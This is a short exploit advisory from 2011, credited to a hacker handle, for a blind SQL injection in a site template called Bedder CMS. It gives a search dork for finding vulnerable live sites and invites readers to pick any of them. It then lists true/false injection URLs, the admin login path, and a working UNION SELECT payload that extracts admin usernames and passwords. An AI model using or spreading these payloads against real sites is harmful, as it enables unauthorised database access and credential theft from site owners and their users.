1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
#(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date: 15.04.2011 #(+) Hour: 13:37 PM #(+) E-mail:xecuti0n3r()yahoo.com #(+) dork: intext:"Design by Bedder" #(+) Category: Web Apps [Blind SQli] ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext:"Design by Bedder" in search engine *Blind SQL injection Vulnerability* # [+]True : http://site.com/teams.php?id=1 and 1=1-- # [+]False: http://site.com/teams.php?id=1 and 1=2-- # [+]eViL : http://site.com/teams.php?id=[SQLi] # [+]True : http://site.com/activiteiten.php?id=91 and 1=1-- # [+]False: http://site.com/activiteiten.php?id=91 and 1=2-- # [+]eViL : http://site.com/activiteiten.php?id=[SQLi] # [+]Cms Login Page is at : http://site.com/cms/index.php #[+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0n3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r ######################################################################## |